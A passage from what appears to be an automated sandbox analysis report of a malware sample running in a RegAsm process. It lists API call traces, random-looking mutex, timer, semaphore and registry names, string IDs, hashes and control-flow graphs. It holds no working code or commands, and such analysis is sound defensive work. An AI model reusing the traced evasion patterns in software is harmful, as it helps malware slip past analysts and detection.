                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A095
                                                                • SetEnvironmentVariableA.KERNEL32(3ea1jj2a,q3etk14f), ref: 0040A0A9
                                                                • OutputDebugStringA.KERNEL32(tcbeioeps), ref: 0040A0B2
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLxkunipu6), ref: 0040A0BF
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A0C7
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_4y0ori58), ref: 0040A0D6
                                                                • SetEvent.KERNEL32(00000000), ref: 0040A0DF
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040A0E6
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_obehzf3u), ref: 0040A0FB
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A0FE
                                                                • OutputDebugStringA.KERNEL32(tiwnylch0), ref: 0040A109
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000001EE,00000000), ref: 0040A119
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A120
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX4z00y3dg), ref: 0040A12F
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040A13A
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regvftu6lz0,00000000,00020019,?), ref: 0040A158
                                                                • GetLastError.KERNEL32 ref: 0040A15E
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000011BD,00000000), ref: 0040A182
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040A189
                                                                • OutputDebugStringA.KERNEL32(teqpwudeb), ref: 0040A194
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXdhtqvkw3), ref: 0040A19F
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040A1AA
                                                                • LocalAlloc.KERNEL32(00000000,00000A31), ref: 0040A1B7
                                                                • LocalFree.KERNEL32(00000000), ref: 0040A1BE
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regaq0b5t8d,00000000,00020019,?), ref: 0040A1DA
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_oub7h52a), ref: 0040A1E9
                                                                • SetEnvironmentVariableA.KERNEL32(j9t3a45b,5d227bfk), ref: 0040A1F7
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A1FA
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML71cmvfhb), ref: 0040A211
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A218
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_vlpohx8g), ref: 0040A229
                                                                • SetEnvironmentVariableA.KERNEL32(braglban,kb6fjaib), ref: 0040A237
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A23E
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regtg6hgy4i,00000000,00020019,?), ref: 0040A25E
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gl9rlb32), ref: 0040A26F
                                                                • SetEvent.KERNEL32(00000000), ref: 0040A278
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040A27F
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mj0fpgou), ref: 0040A28F
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000), ref: 0040A2AF
                                                                • SetEvent.KERNEL32(00000000), ref: 0040A2B8
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040A2BF
                                                                • LocalAlloc.KERNEL32(00000000,00000039), ref: 0040A2C9
                                                                • OutputDebugStringA.KERNEL32(toy33ol74), ref: 0040A2D6
                                                                • LocalFree.KERNEL32(00000000), ref: 0040A2D9
                                                                • OutputDebugStringA.KERNEL32(tdsc9rk0q), ref: 0040A2E4
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000028F,00000000), ref: 0040A2F4
                                                                • OutputDebugStringA.KERNEL32(tcgrgqimv), ref: 0040A301
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040A304
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_g6taiqrz), ref: 0040A315
                                                                • SetEnvironmentVariableA.KERNEL32(g85kbixa,7gl86t31), ref: 0040A327
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A32E
                                                                • GetLastError.KERNEL32 ref: 0040A338
                                                                • FindFirstFileA.KERNEL32(s_si61chqu,?), ref: 0040A34B
                                                                • FindClose.KERNEL32(00000000), ref: 0040A352
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_a48a899t), ref: 0040A367
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A36E
                                                                • OutputDebugStringA.KERNEL32(t4xm2me3a), ref: 0040A37B
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pto6pfv2), ref: 0040A386
                                                                • SetEnvironmentVariableA.KERNEL32(51v3k8q2,ohdt31xv), ref: 0040A394
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A39D
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML3n3278d8), ref: 0040A3B0
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A3B7
                                                                  • Part of subcall function 0040DC49: RegOpenKeyExA.ADVAPI32(80000001,regduvy6vjh,00000000,00020019,?,74DE9350,74DE7CD0,74E04B60), ref: 0040DC6C
                                                                  • Part of subcall function 0040DC49: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_iel5vn6f), ref: 0040DC7B
                                                                  • Part of subcall function 0040DC49: GetLastError.KERNEL32 ref: 0040DC89
                                                                  • Part of subcall function 0040DC49: CancelWaitableTimer.KERNEL32(00000000), ref: 0040DC8C
                                                                  • Part of subcall function 0040DC49: FindFirstFileA.KERNEL32(s_4o4wkk8x,?), ref: 0040DC9E
                                                                  • Part of subcall function 0040DC49: FindClose.KERNEL32(00000000), ref: 0040DCA5
                                                                  • Part of subcall function 0040DC49: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0ps9kk75), ref: 0040DCB6
                                                                  • Part of subcall function 0040DC49: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCC1
                                                                  • Part of subcall function 0040DC49: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_co8m4cgj), ref: 0040DCD2
                                                                  • Part of subcall function 0040DC49: SetEvent.KERNEL32(00000000), ref: 0040DCDB
                                                                  • Part of subcall function 0040DC49: ResetEvent.KERNEL32(00000000), ref: 0040DCE2
                                                                  • Part of subcall function 0040DC49: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_yqgz522c), ref: 0040DCF3
                                                                  • Part of subcall function 0040DC49: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCFE
                                                                  • Part of subcall function 0040DC49: GetLastError.KERNEL32 ref: 0040DD08
                                                                  • Part of subcall function 0040DC49: CreateMutexA.KERNEL32(00000000,00000000,MTXphqqzlgp), ref: 0040DD13
                                                                  • Part of subcall function 0040DC49: OutputDebugStringA.KERNEL32(ttljfcwbf), ref: 0040DD24
                                                                  • Part of subcall function 0040DC49: ReleaseMutex.KERNEL32(00000000), ref: 0040DD2B
                                                                  • Part of subcall function 0040DC49: SetEnvironmentVariableA.KERNEL32(8b5m7j2t,j365hmj6), ref: 0040DD3B
                                                                  • Part of subcall function 0040DC49: lstrlenA.KERNEL32(23b7de51bb42a569733f1e26dbce63ba), ref: 0040DD84
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001), ref: 0040A3D9
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A3E0
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_sppgcywv), ref: 0040A3F1
                                                                • OutputDebugStringA.KERNEL32(txa3akxyw), ref: 0040A3FA
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A402
                                                                • GetLastError.KERNEL32 ref: 0040A40C
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg130n27js,00000000,00020019,?), ref: 0040A429
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_f6qx4h48), ref: 0040A437
                                                                • GetLastError.KERNEL32 ref: 0040A43F
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A44A
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_pbzpxiig), ref: 0040A455
                                                                • SetEvent.KERNEL32(00000000), ref: 0040A45E
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040A465
                                                                • LocalFree.KERNEL32(00000000), ref: 0040A546
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000798,00000000), ref: 0040A5CD
                                                                • OutputDebugStringA.KERNEL32(tvu3egh8o), ref: 0040A5DA
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040A5DD
                                                                • CreateWaitableTimerA.KERNEL32(80000001,regx7zezh7y,00000000,00020019,?), ref: 0040A5F9
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_21gm8brb), ref: 0040A60E
                                                                • GetLastError.KERNEL32 ref: 0040A614
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 0040A623
                                                                • SetEnvironmentVariableA.KERNEL32(pbzzr5wc,v30tm2d8), ref: 0040A635
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_fqkemyr8), ref: 0040A642
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A64D
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg8zns2qjh,00000000,00020019,?), ref: 0040A66D
                                                                • GetLastError.KERNEL32 ref: 0040A675
                                                                • LocalFree.KERNEL32(?), ref: 0040A68F
                                                                • LocalFree.KERNEL32(00000000), ref: 0040A69E
                                                                • LocalFree.KERNEL32(?), ref: 0040A6CB
                                                                • LocalFree.KERNEL32(?), ref: 0040A6D5
                                                                • LocalFree.KERNEL32(?), ref: 0040A6DF
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_i1maa28u), ref: 0040A716
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A720
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg2w5gfbud,00000000,00020019,?), ref: 0040A746
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLmzyb9zn8), ref: 0040A755
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A75F
                                                                • LocalAlloc.KERNEL32(00000000,000004AC), ref: 0040A76B
                                                                • LocalFree.KERNEL32(00000000), ref: 0040A772
                                                                • FindFirstFileA.KERNEL32(s_tfgtj6rz,?), ref: 0040A785
                                                                • FindClose.KERNEL32(00000000), ref: 0040A78C
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C33,00000000), ref: 0040A79E
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A7A5
                                                                • SetEnvironmentVariableA.KERNEL32(t5lc3xp7,niw9gxm6), ref: 0040A7B5
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_w7d4e7br), ref: 0040A7BF
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A7C2
                                                                • GetLastError.KERNEL32 ref: 0040A7C8
                                                                • SetEnvironmentVariableA.KERNEL32(khhzyesc,jl4t9b96), ref: 0040A7DB
                                                                • CreateWaitableTimerA.KERNEL32(00000001,00000001,WTMR_cd3vbeik), ref: 0040A7EA
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040A7F7
                                                                • OutputDebugStringA.KERNEL32(tz5axcx62), ref: 0040A804
                                                                • ExitProcess.KERNEL32 ref: 0040A838
                                                                • ExitProcess.KERNEL32 ref: 0040A874
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$SemaphoreTimerWaitable$Release$Local$EnvironmentEventVariable$CancelDebugOutputString$ErrorFindLast$Free$Open$CloseFileMutex$Alloc$Mapping$Reset$ChangeNotification$First$ExitProcesslstrlen$Handle$Initialize
                                                                • String ID: $ $ $ $002oxa6s$161wgn8y$1yqp8rgm$23b7de51bb42a569733f1e26dbce63ba$27tkawec$3ea1jj2a$4u0yaheq$51v3k8q2$5ce5ttlh$5d227bfk$5jmcc7u5$5nvulrot$6g69ivna$7gl86t31$9as963us$9kcjkxl4$MTX4z00y3dg$MTXapeqgoy0$MTXdhtqvkw3$MTXpzc2har6$MTXqamhcxjd$MTXs7yc2cpf$MTXxjk5ahv4$MTXz3u02dvk$SMPHR_2eq14qd1$SMPHR_2hyvdvo7$SMPHR_6lpzdlwo$SMPHR_e2jplyy5$SMPHR_fqkemyr8$SMPHR_g6taiqrz$SMPHR_i1maa28u$SMPHR_ryx02sq6$SMPHR_sppgcywv$SMPHR_uop44cey$SMPHR_uwv8pkbg$SMPHR_vlpohx8g$SMPHR_vpy2bwwa$SMPHR_y57u78i2$WTMR_21gm8brb$WTMR_2txq3mdt$WTMR_7fjgma4m$WTMR_89mr44nv$WTMR_90d3uvs3$WTMR_a48a899t$WTMR_adwimds2$WTMR_cd3vbeik$WTMR_cjcjokyw$WTMR_dyzpca0g$WTMR_f6qx4h48$WTMR_hs0dk2a5$WTMR_mj0fpgou$WTMR_nxosby4a$WTMR_obehzf3u$WTMR_oub7h52a$WTMR_p0n3nl7z$WTMR_pto6pfv2$WTMR_sj1xw7ld$WTMR_t9m6egtl$WTMR_tr76xwe3$WTMR_v5k45pxa$WTMR_v69s0jur$WTMR_vxf9syn6$WTMR_vyhzltt5$WTMR_w7d4e7br$WTMR_x8gpb0lb$WTMR_yr4guqvv$XML0vfjvhca$XML3n3278d8$XML5fi0z4wo$XML71cmvfhb$XMLb8uaoddh$XMLf3sp4yo9$XMLjlel85wp$XMLk2begpxq$XMLmzyb9zn8$XMLnusjnsj4$XMLsuug0zye$XMLxkunipu6$XMLz5rmbhid$azsmnf7g$b4z1gplo$bogln9j8$braglban$c5wa0nkd$d4cmirb6$d7sl3m43$e0qagkaq$eazbdckw$ev_4y0ori58$ev_69lhuihm$ev_bvwkjxju$ev_gl9rlb32$ev_hdsn5yos$ev_ky9wrxpo$ev_mo34bm41$ev_pbzpxiig$f1tx9ijh$f35cv2jv$f5p68xvg$ft98khpd$g85kbixa$ge955tme$hv8euc46$j9t3a45b$jl4t9b96$kb6fjaib$khhzyesc$ku9syi5h$lgunryec$llliohkc$lsdlhn77$mokchxe1$niw9gxm6$ohdt31xv$omc9fsdv$p1bpvb3k$p44tx6zp$pbzzr5wc$q3etk14f$qjqhz0u1$reg130n27js$reg2w5gfbud$reg4dqscw5e$reg8zns2qjh$regaq0b5t8d$regd2rr3a8q$regihm21o6p$regl9ou77sk$regln1bdbu9$regne7jg826$regpf00k4ni$regppkzko0j$regtdxb12x8$regtg6hgy4i$reguqgyqj10$reguwfk0hla$regvftu6lz0$regx7zezh7y$regxdm8zho5$s264ue31$s_2ubk6zki$s_a0toa3p9$s_gt9kio2q$s_prfrvct4$s_si61chqu$s_sny9se1j$s_tfgtj6rz$s_ww785inq$stbpwo2y$su1oex00$t1llz488k$t4xm2me3a$t5lc3xp7$t67h61xmt$tamx0g12y$tcbeioeps$tcgrgqimv$tdrs9xk82$tdsc9rk0q$teqpwudeb$tf9fnyzeu$th165yn1l$tiwnylch0$tjetkpjp5$tlvo7moy8$tmpq5eank$toy33ol74$tp32whtjp$tqeqy21fj$ttllcje41$tv8nwi2ye$tvu3egh8o$tw0xu14w8$txa3akxyw$ty1p0rbxh$tygxt7169$tz5axcx62$un3l2zxs$uy3n4usz$v30tm2d8$xdjt50gy$xs5vk1s3$xzk43o9r$yiiah0mu$z1t84hi9
                                                                • API String ID: 53752110-1357364596
                                                                • Opcode ID: 4a885ce96f0de876d578b7d35e892e482201367287c8ace73c0e263dd89c3aad
                                                                • Instruction ID: e77971dfa8cd59fb02b6948e947a628a10bf7698073f448a95d7aa0260a18d40
                                                                • Opcode Fuzzy Hash: 4a885ce96f0de876d578b7d35e892e482201367287c8ace73c0e263dd89c3aad
                                                                • Instruction Fuzzy Hash: 8DB27871A44350BBD7106FB0DD4AFDE3FA8AB4CB46F104426F705E65E1CAB899808B6D
                                                                Function 0040F788 Relevance: 180.6, APIs: 68, Strings: 35, Instructions: 309timeregistrysynchronizationCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 616 40f788-40f805 LocalAlloc GetLastError LocalFree RegOpenKeyExA CreateEventA SetEvent ResetEvent CreateWaitableTimerA 617 40f811 616->617 618 40f807-40f80f CancelWaitableTimer 616->618 619 40f816-40f84e OutputDebugStringA CreateSemaphoreA ReleaseSemaphore CreateMutexA 617->619 618->619 620 40f870-40f953 CreateWaitableTimerA CancelWaitableTimer GetLastError CreateFileMappingW RegOpenKeyExA CloseHandle SetEnvironmentVariableA FindFirstFileA FindClose LocalAlloc LocalFree CreateEventA SetEvent ResetEvent CreateWaitableTimerA CancelWaitableTimer CreateWaitableTimerA 619->620 621 40f850-40f86e SetEnvironmentVariableA ReleaseMutex OutputDebugStringA 619->621 623 40f961-40f96b SetEnvironmentVariableA 620->623 624 40f955-40f95f CancelWaitableTimer OutputDebugStringA 620->624 621->620 625 40f971-40f999 CreateSemaphoreA OutputDebugStringA ReleaseSemaphore 623->625 624->625 626 40f99b GetLastError 625->626 627 40f99d-40fa44 call 40e48d call 40de71 call 40f012 * 2 CreateEventA SetEvent ResetEvent CreateWaitableTimerA CancelWaitableTimer CreateFileMappingW GetLastError CloseHandle CreateWaitableTimerA GetLastError 625->627 626->627 637 40fa46-40fa47 CancelWaitableTimer 627->637 638 40fa49-40faa0 CreateSemaphoreA ReleaseSemaphore RegOpenKeyExA CreateSemaphoreA GetLastError ReleaseSemaphore 627->638 637->638 639 40faa2-40fab7 RegOpenKeyExA 638->639 640 40fab9-40fae6 LocalAlloc LocalFree RegOpenKeyExA 638->640 639->640 641 40fae7-40faec GetLastError 640->641 641->641 642 40faee-40fb16 FindFirstFileA FindClose CreateMutexA 641->642 643 40fb21-40fb2b SetEnvironmentVariableA 642->643 644 40fb18-40fb1f ReleaseMutex 642->644 645 40fb31-40fb51 LocalFree 643->645 644->645
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                • GetLastError.KERNEL32 ref: 0040F7AD
                                                                • LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                • SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                • OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                • SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                • ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                • OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                • GetLastError.KERNEL32 ref: 0040F882
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                • SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • FindFirstFileA.KERNEL32(s_61jb01mx,?), ref: 0040F8E9
                                                                • FindClose.KERNEL32(00000000), ref: 0040F8F0
                                                                • LocalAlloc.KERNEL32(00000000,00000EF3), ref: 0040F8FE
                                                                • LocalFree.KERNEL32(00000000), ref: 0040F905
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n9fcr403), ref: 0040F914
                                                                • SetEvent.KERNEL32(00000000), ref: 0040F91D
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040F924
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_90ycp0c2), ref: 0040F933
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F940
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ejqbin6h), ref: 0040F94B
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F956
                                                                • OutputDebugStringA.KERNEL32(t60isn899), ref: 0040F95D
                                                                • SetEnvironmentVariableA.KERNEL32(jnbp7w8t,th9l7yzz), ref: 0040F96B
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_4mr1tbn2), ref: 0040F97C
                                                                • OutputDebugStringA.KERNEL32(t1xpmw5to), ref: 0040F989
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F991
                                                                • GetLastError.KERNEL32 ref: 0040F99B
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_ppfv76lo), ref: 0040F9E6
                                                                • SetEvent.KERNEL32(00000000), ref: 0040F9EF
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040F9F6
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_i0q2h1lg), ref: 0040FA06
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040FA13
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000004E,00000000), ref: 0040FA1E
                                                                • GetLastError.KERNEL32 ref: 0040FA26
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FA29
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_sq7avrj1), ref: 0040FA38
                                                                • GetLastError.KERNEL32 ref: 0040FA40
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040FA47
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLikw06o49), ref: 0040FA5A
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FA60
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regf217bk30,00000000,00020019,?), ref: 0040FA80
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_zuz2r5sz), ref: 0040FA8D
                                                                • GetLastError.KERNEL32 ref: 0040FA91
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FA98
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regfbk5xbk3,00000000,00020019,?), ref: 0040FAB7
                                                                • LocalAlloc.KERNEL32(00000000,00000988), ref: 0040FAC0
                                                                • LocalFree.KERNEL32(00000000), ref: 0040FAC7
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regzrv2ygo6,00000000,00020019,?), ref: 0040FAE2
                                                                • GetLastError.KERNEL32 ref: 0040FAE7
                                                                • FindFirstFileA.KERNEL32(s_wypnk40k,?), ref: 0040FAFA
                                                                • FindClose.KERNEL32(00000000), ref: 0040FB01
                                                                • CreateMutexA.KERNEL32(00000002,00000002,MTXbuj0t1o5), ref: 0040FB0E
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040FB19
                                                                • SetEnvironmentVariableA.KERNEL32(uyfrlhcm,tdn2hc46), ref: 0040FB2B
                                                                • LocalFree.KERNEL32(00410AB3), ref: 0040FB44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$TimerWaitable$Event$Semaphore$ErrorLastLocal$CancelRelease$Open$CloseDebugEnvironmentFileFindFreeMutexOutputStringVariable$AllocReset$FirstHandleMapping
                                                                • String ID: MTX5u8ptwy0$MTXbuj0t1o5$SMPHR_4mr1tbn2$SMPHR_zuz2r5sz$WTMR_8zhp33zt$WTMR_90ycp0c2$WTMR_ejqbin6h$WTMR_fgohzvee$WTMR_i0q2h1lg$WTMR_sq7avrj1$XMLf91r4xcv$XMLikw06o49$ev_n9fcr403$ev_ppfv76lo$ev_v4tqtxno$jnbp7w8t$nhy1vzmm$regf217bk30$regfbk5xbk3$regnzv4wvxn$regr3z819eq$regzrv2ygo6$s_61jb01mx$s_wypnk40k$t1pi8p487$t1xpmw5to$t45511ik9$t60isn899$tdn2hc46$th9l7yzz$ttorgxv5m$uyfrlhcm$wem6yeez$wfy3i05h$xjah9ors
                                                                • API String ID: 1810849218-2433077723
                                                                • Opcode ID: b2f5e02257cfc847488809f7f81bbcb3abfd7eb21354bdd4ddeda6d41b61686e
                                                                • Instruction ID: ea02b96465bf7696cd3440a59384d462777eba736ecbe720139a01a83ec10eff
                                                                • Opcode Fuzzy Hash: b2f5e02257cfc847488809f7f81bbcb3abfd7eb21354bdd4ddeda6d41b61686e
                                                                • Instruction Fuzzy Hash: A8A18335E80354BBD7206BA19D4EFDE3E68AB89B51F114032F705F65E0CBBC59808A6D
                                                                Function 0040FC1E Relevance: 178.8, APIs: 65, Strings: 37, Instructions: 303timesynchronizationregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
